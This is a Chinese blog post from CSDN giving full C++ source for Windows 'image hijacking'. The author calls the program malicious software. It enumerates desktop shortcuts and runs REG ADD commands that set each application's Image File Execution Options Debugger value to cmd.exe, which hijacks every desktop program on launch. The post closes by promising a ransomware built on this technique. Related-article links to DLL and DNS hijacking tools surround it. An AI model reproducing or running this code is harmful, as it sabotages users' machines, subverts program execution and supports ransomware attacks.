C/C++实现windows下的映像劫持(下)之代码实现

最新推荐文章于 2020-09-22 13:15:00 发布
最新推荐文章于 2020-09-22 13:15:00 发布
阅读量5.1w 收藏 6
点赞数 2
分类专栏: 映像劫持 网络安全 C/C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27180763/article/details/82556316
版权
网络安全 同时被 3 个专栏收录
77 篇文章 4 订阅
订阅专栏
C/C++
32 篇文章 1 订阅
订阅专栏
映像劫持
3 篇文章 1 订阅
订阅专栏

#C/C++实现windows下的映像劫持(下)之代码实现
#####上一篇文章我们给大家阐述了windows下的映像劫持的原理。本篇文章我将来和大家分享,Windows下如何使用C/C++实现恶意软件修改注册表从而实现映像劫持。
######附上一篇文章传送门:
https://blog.csdn.net/qq_27180763/article/details/82556058

######实现映像劫持所必需的头文件有:

#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>

#####在这里,我的程序并未使用任何隐藏技术和多线程技术,准确的说不能算是木马,但是必要之时却也可以起到相应的作用。由于节约时间的问题,我仅仅制作了对当前用户桌面下的所有文件的映像劫持。

######获取桌面路径:

string  getDesktopPath()		//获取桌面路径
	{
		LPITEMIDLIST pidl;
		LPMALLOC pShellMalloc;
		char szDir[200];
		if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
		{
			if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
				// 如果成功返回true  
				SHGetPathFromIDListA(pidl, szDir);
				pShellMalloc->Free(pidl);
			}
			pShellMalloc->Release();
		}
		return string(szDir);
	}

######遍历桌面下所有文件并将所有文件添加到我的list中,来模拟实现链表的功能:

int  GetAllgpxFilepathFromfolder(string Path)
	{
		char szFind[MAX_PATH];
		WIN32_FIND_DATA FindFileData;
		strcpy(szFind, Path.c_str());
		strcat(szFind, "\\*.*");
		HANDLE hFind = FindFirstFile(szFind, &FindFileData);
		if (INVALID_HANDLE_VALUE == hFind)	return -1;
		do
		{
			if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
			{
				if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
				{
					char szFile[MAX_PATH] = { 0 };
					strcpy(szFile, Path.c_str());
					strcat(szFile, "\\");
					strcat(szFile, FindFileData.cFileName);
					GetAllgpxFilepathFromfolder(szFile);
				}
			}else{
				FileName.push_back(FindFileData.cFileName);
			}
		} while (FindNextFile(hFind, &FindFileData));
		FindClose(hFind);
		return 0;
	}

######这是我从网上copy的一串代码==自己懒得写,,就copy了,作用是从字符串str中把所有的字符A转换成B,虽然我感觉他这个函数写的还是有点问题。。

void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
	std::size_t found = S.find(A);
	while (std::string::npos != found) {
		S.replace(found, A.length(), B);
		found = S.find(A, found + 1);
	}
}

#####基本的核心代码就是以上这些,现在我们来看下主函数调用:(构造函数已省略,完全代码在后面。)

Hacker* one = new Hacker();
	string arr;
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		replaceA_to_B(*itor, ".lnk", ".exe");
		int pos = 0;
		pos =(*itor).find(".exe");
		if (-1 != pos)
		{
			*itor = (*itor).substr(0, pos+4);
		}
	}
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + "  /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
		system(arr.c_str());
	}
	system("pause");
	return 0;

#####唯一要注意的就是win7下貌似注册表项要加双引号才可以访问,win10貌似没有这个要求。在C/C++中,要注意转义字符,所以特别提醒这个双引号转义的问题。

附全部源码:

#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
class Hacker {
public:
	Hacker()
	{
		Path = this->getDesktopPath();
		GetAllgpxFilepathFromfolder(Path);
	}
private:
	string Path;
public:
	list<string> FileName;
private:
	string  getDesktopPath()		//获取桌面路径
	{
		LPITEMIDLIST pidl;
		LPMALLOC pShellMalloc;
		char szDir[200];
		if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
		{
			if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
				// 如果成功返回true  
				SHGetPathFromIDListA(pidl, szDir);
				pShellMalloc->Free(pidl);
			}
			pShellMalloc->Release();
		}

		return string(szDir);
	}

private:
	int  GetAllgpxFilepathFromfolder(string Path)
	{
		char szFind[MAX_PATH];
		WIN32_FIND_DATA FindFileData;
		strcpy(szFind, Path.c_str());
		strcat(szFind, "\\*.*");
		HANDLE hFind = FindFirstFile(szFind, &FindFileData);
		if (INVALID_HANDLE_VALUE == hFind)	return -1;
		do
		{
			if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
			{
				if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
				{
					//发现子目录,递归之
					char szFile[MAX_PATH] = { 0 };
					strcpy(szFile, Path.c_str());
					strcat(szFile, "\\");
					strcat(szFile, FindFileData.cFileName);
					GetAllgpxFilepathFromfolder(szFile);
				}
			}else{
				FileName.push_back(FindFileData.cFileName);
			}
		} while (FindNextFile(hFind, &FindFileData));
		FindClose(hFind);
		return 0;
	}
};

void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
	std::size_t found = S.find(A);
	while (std::string::npos != found) {
		S.replace(found, A.length(), B);
		found = S.find(A, found + 1);
	}
}
int main()
{
	Hacker* one = new Hacker();
	string arr;
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		replaceA_to_B(*itor, ".lnk", ".exe");
		int pos = 0;
		pos =(*itor).find(".exe");
		if (-1 != pos)
		{
			*itor = (*itor).substr(0, pos+4);
		}
	}
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + "  /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
		system(arr.c_str());
	}
	system("pause");
	return 0;
}

#下一期我们将给大家带来基于windows下的映像劫持攻击后的勒索病毒实现。

程序小黑
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【C/C++劫持技术
linchaolong的专栏
02-28 7883
劫持 劫持的原理就是把目标函数的指针的指向修改为自定义函数的地址。 函数是放在内存中的代码区,所以劫持代码区密切相关。 实现劫持需要使用detours。 detours detours是微软亚洲研究院出口的信息安全产品,主要用于劫持。这个工具使用C语言实现,所以是跨平台的。 detours根据函数指针改变函数的行为,可以拦截任何函数,即使操作系
DLL劫持C++代码创建器
03-21
本工具自动创建用于进行DLL劫持C++代码。选择你正在运行的应用程序,选择应用程序加载的DLL,本工具为你创建一个用户劫持此DLL的源代码代码中有详细的指导,按照指导去配置你的VS,马上编译一个用来劫持的DLL。马上下载下来试试吧。如何创建这个工具,请查看软件的帮助。
C++实现DNS劫持
09-08
DNS劫持代码,用户可以传一个ip当作DNS服务器,被攻击者的dns会自动指向您的欺诈DNS服务器。
C语言/C++基础之实现绕线画代码
12-20
C语言/C++基础之实现绕线画代码,适合初学C语言/C++的小伙伴学习研究,博客中有对应的讲解和演示,避免走弯路,费时费力。也真心希望能够帮助正在苦学C语言/C++ 程序设计的小伙伴们,你们的成长是我最大的幸福
DLL劫持代码生成.zip
09-24
DLL劫持代码生成.zip 用于生产劫持dll的xxx.cpp代码
C/C++实现linux和Windows查看系统、进程、服务的内存和CPU使用
11-30
遇到需求写的代码,没那么正规,但也请你尊重作者 C/C++实现linux和Windows查看系统、进程、服务的内存和CPU使用情况的源代码,生成的是静态链接库,Windows和Linux下经测试都可用,查看系统、指定名称的服务、指定名称的进程占用CPU和内存,查看方式不是通过程序中运行命令行的方式,而是采用系统提供的接口去查看内核状态 在开发中遇到需要查看这些信息的朋友可以去使用 如有疑问或好的建议请发送邮件至[email protected]
C++实现映像劫持
09-08
基于C++实现映像劫持。 通过更改注册表实现对文件的打开方式的锁定更改。
C++劫持注入(适用于大部分dll)
太期待丶
03-10 7411
导出函数使用depends查看 新建win32 dll 带导出符号 1.用depends查看原dll中所有的调用函数 #pragma comment(linker,"/EXPORT:导出函数名=自写函数名,@导出序号") 2.获取原函数的地址 DWORD oldCall[x];//原dll中调用了多少函数定义多少 +1 void initCall(void){
通过中转DLL函数实现DLL劫持
CSDN
09-22 5269
当我们运行程序时,一般情况下会默认加载Ntdll.dll和Kernel32.dll这两个链接库,在进程未被创建之前Ntdll.dll库就被默认加载了,三环下任何对其劫持都是无效的,除了该Dll外,其他的Dll都是在程序运行时,在输入表中查找到对应关系后才会被装载到内存中的,理论上来说对除NtDll以外的其他库都是可操作的。编译main.cpp 动态加载函数,将lyshark.dll放入同一个目录下即可,程序运行后会动态调用DLL中的导出函数。默认会生成如下样子,直接在里面加上一个弹窗,然后编译DLL。
X86软件逆向分析实战(一)
10-21
对于那些“不听话”的软件,怎么办?你是想忍声吞气凑合着用?还是想“修理”一顿,让它乖乖地按照你的意思办?本课程教你“驯服”那些你看中的软件! 掌握这个技能,无论它是什么软件,只能乖乖按你的意思办! 课程内容会涉及到与X86软件逆向分析相关的各种杂项与细节实现,其中涵盖OD、CE、IDA、WinAPI、Visual Studio 2019、易语言、C/C++、C#、汇编等使用技巧与编程技巧。若你是编程初学者,认真学习本课程后,你的能力将会有极大的提升。若你是编程大佬,建议勿跳过每一节课,一定会有所收获!
对一个程序启动 到 在控件中自动输入
xmmdbk的博客
09-02 180
#include "stdafx.h" #include<iostream> #include<string> #include<Windows.h> #include<ShlObj.h> #include<Shlwapi.h> #include<cstring> #include<io.h> #include&l...
镜像劫持
04-25
用来扫描及修改系统内的镜像劫持文件
dll开发源码
06-18
网络下载,dll演示源代码,可用于初学者的范例
用C/C++实现SMC动态代码加密技术
02-04
火龙果软件工程技术中心摘要:...由于该技术需要直接读写对内存中的机器码,所以多采用汇编语言实现,这使得很多想在自己的程序中使用SMC技术进行软件加密的C/C++程序员望而却步。针对这种现状,本文提出了几种基于C/C+
linux下用C/C++实现的代理服务器
04-07
在linux平台下,涉及到unix套节字编程,用C/C++实现代理服务器,是基于TCP/IP和HTTP协议的编程
C/C++实现区块链(下)之区块链实现(原创代码,转载必究)
热门推荐
单核CPU的小朋友的博客
09-10 6万+
C/C++实现区块链(下)之区块链实现(原创代码,转载必究) 算法原理传送门:https://blog.csdn.net/qq_27180763/article/details/82588136 算法实现传送门:https://blog.csdn.net/qq_27180763/article/details/82588194 看了上面的算法,相信大家基本可以猜到,相对于比特币的...
使用PHP实现WEB网站登陆后台编写
单核CPU的小朋友的博客
09-13 6万+
使用PHP实现WEB网站登陆后台编写 html页面,没加入CSS代码: &amp;amp;lt;form action=&amp;quot;login.php&amp;quot; method=&amp;quot;post&amp;quot;&amp;amp;gt; &amp;amp;lt;input type=&amp;quot;text&amp;quot; placeholder=&amp;quot;
C/C++实现区块链(中)之算法实现(原创代码,转载必究)
单核CPU的小朋友的博客
09-10 5万+
C/C++实现区块链(中)之算法实现(原创代码,转载必究) 上一篇文章我们讲述了区块链实现的基本算法原理,传送门https://blog.csdn.net/qq_27180763/article/details/82588136 这一节我将用C/C++技术来和大家分享区块链技术中的加密算法实现。 1、矩阵类实现 class Martix { public: stat...
C/C++实现区块链(上)之加密算法(原创算法,转载必究)
单核CPU的小朋友的博客
09-10 5万+
C/C++实现区块链(上)之加密算法(原创算法,转载必究) 本算法基于椭圆标准方程、线性代数、数据结构,纯属自制。仅供学习参考,不得用于商业用途。 首先了解下椭圆标准方程: 我们先模拟下长轴为Y轴时(即焦点F在Y轴上,F的横坐标为0的情况),然后根据椭圆的定义,得到椭圆上任意一点F,到焦点F1,F2的距离|MF1|+|MF2|是一个常数。,这个时候连接MF1和MF2。然后很容易得...
c/c++调用windows自身API实现的跳棋游戏
最新发布
02-16
你可以使用 C/C++ 编程语言,调用 Windows 自身的 API 实现跳棋游戏。 Windows 自身的 API 包含了许多图形界面库和游戏开发库,例如 Windows API 和 DirectX 等,它们可以让你很方便地实现跳棋游戏的图形界面和游戏...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序小黑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值